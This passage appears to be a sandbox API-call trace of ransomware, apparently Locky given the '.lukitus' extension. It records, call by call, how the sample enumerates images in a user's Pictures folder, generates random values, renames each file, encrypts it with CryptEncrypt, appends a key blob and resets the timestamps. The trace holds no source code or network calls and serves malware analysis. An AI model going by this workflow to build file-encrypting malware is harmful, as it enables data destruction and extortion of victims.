ftCreationTime.dwLowDateTime=0x7b5e460, ftCreationTime.dwHighDateTime=0x1d2f8d1, ftLastAccessTime.dwLowDateTime=0x70eb1450, ftLastAccessTime.dwHighDateTime=0x1d2f92b, ftLastWriteTime.dwLowDateTime=0x70eb1450, ftLastWriteTime.dwHighDateTime=0x1d2f92b, nFileSizeHigh=0x0, nFileSizeLow=0x7636)) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.114] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.115] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\CS rWU_9qBGaWWl2CS.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\cs rwu_9qbgawwl2cs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.115] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\CS rWU_9qBGaWWl2CS.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\cs rwu_9qbgawwl2cs.png"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-ED8E90B1-C99EEB3CD344.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-ed8e90b1-c99eeb3cd344.lukitus"), dwFlags=0x9) returned 1 [0108.116] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.116] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.122] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7636, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7636, lpOverlapped=0x0) returned 1 [0108.122] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.122] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7636, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7636, lpOverlapped=0x0) returned 1 [0108.123] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.123] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64790b70, dwHighDateTime=0x1d31760)) [0108.123] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.123] FlushFileBuffers (hFile=0x328) returned 1 [0108.132] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\Ou8E5Tf1Sws.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\ou8e5tf1sws.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd721630, ftCreationTime.dwHighDateTime=0x1d2fa68, ftLastAccessTime.dwLowDateTime=0x83c19c0, ftLastAccessTime.dwHighDateTime=0x1d30134, ftLastWriteTime.dwLowDateTime=0x83c19c0, ftLastWriteTime.dwHighDateTime=0x1d30134, nFileSizeHigh=0x0, nFileSizeLow=0x12f87)) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.132] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\Ou8E5Tf1Sws.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\ou8e5tf1sws.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.132] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\Ou8E5Tf1Sws.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\ou8e5tf1sws.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-D8D6A0BE-1EEB096F86F6.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-d8d6a0be-1eeb096f86f6.lukitus"), dwFlags=0x9) returned 1 [0108.136] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.137] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.142] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x12f87, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x12f87, lpOverlapped=0x0) returned 1 [0108.143] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.143] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x12f87, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x12f87, lpOverlapped=0x0) returned 1 [0108.143] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x647b6cd0, dwHighDateTime=0x1d31760)) [0108.143] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.143] FlushFileBuffers (hFile=0x328) returned 1 [0108.153] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\Mx7rpkHkHEU4LD.png" (normalized: "c:\\users\\aetadzjz\\pictures\\mx7rpkhkheu4ld.png"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaf45500, ftCreationTime.dwHighDateTime=0x1d2f635, ftLastAccessTime.dwLowDateTime=0x8cee3440, ftLastAccessTime.dwHighDateTime=0x1d3059a, ftLastWriteTime.dwLowDateTime=0x8cee3440, ftLastWriteTime.dwHighDateTime=0x1d3059a, nFileSizeHigh=0x0, nFileSizeLow=0xd9b3)) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.154] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\Mx7rpkHkHEU4LD.png" (normalized: "c:\\users\\aetadzjz\\pictures\\mx7rpkhkheu4ld.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.154] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\Mx7rpkHkHEU4LD.png" (normalized: "c:\\users\\aetadzjz\\pictures\\mx7rpkhkheu4ld.png"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-C18F2589-5C71BF4F3255.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-c18f2589-5c71bf4f3255.lukitus"), dwFlags=0x9) returned 1 [0108.156] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.156] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.162] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd9b3, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd9b3, lpOverlapped=0x0) returned 1 [0108.163] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.163] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd9b3, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd9b3, lpOverlapped=0x0) returned 1 [0108.163] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.163] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x647dce30, dwHighDateTime=0x1d31760)) [0108.163] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.163] FlushFileBuffers (hFile=0x328) returned 1 [0108.172] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\LSk3e_y_Z.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\lsk3e_y_z.png"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb81df780, ftCreationTime.dwHighDateTime=0x1d3007d, ftLastAccessTime.dwLowDateTime=0xc4a180e0, ftLastAccessTime.dwHighDateTime=0x1d2f762, ftLastWriteTime.dwLowDateTime=0xc4a180e0, ftLastWriteTime.dwHighDateTime=0x1d2f762, nFileSizeHigh=0x0, nFileSizeLow=0x88be)) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.172] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\LSk3e_y_Z.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\lsk3e_y_z.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.173] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\LSk3e_y_Z.png" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\lsk3e_y_z.png"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\97sFY1rz\\F56924BE-9663-41BB-A5D5084D-DECB3B0C7615.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\97sfy1rz\\f56924be-9663-41bb-a5d5084d-decb3b0c7615.lukitus"), dwFlags=0x9) returned 1 [0108.175] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.175] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.181] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x88be, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x88be, lpOverlapped=0x0) returned 1 [0108.182] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.182] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x88be, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x88be, lpOverlapped=0x0) returned 1 [0108.182] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.183] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x648290f0, dwHighDateTime=0x1d31760)) [0108.183] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.183] FlushFileBuffers (hFile=0x328) returned 1 [0108.188] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\7EK45zr96-R7KlQSQB5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\7ek45zr96-r7klqsqb5.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6974be00, ftCreationTime.dwHighDateTime=0x1d2f62f, ftLastAccessTime.dwLowDateTime=0x7b719420, ftLastAccessTime.dwHighDateTime=0x1d2faa3, ftLastWriteTime.dwLowDateTime=0x7b719420, ftLastWriteTime.dwHighDateTime=0x1d2faa3, nFileSizeHigh=0x0, nFileSizeLow=0x85d0)) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.188] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 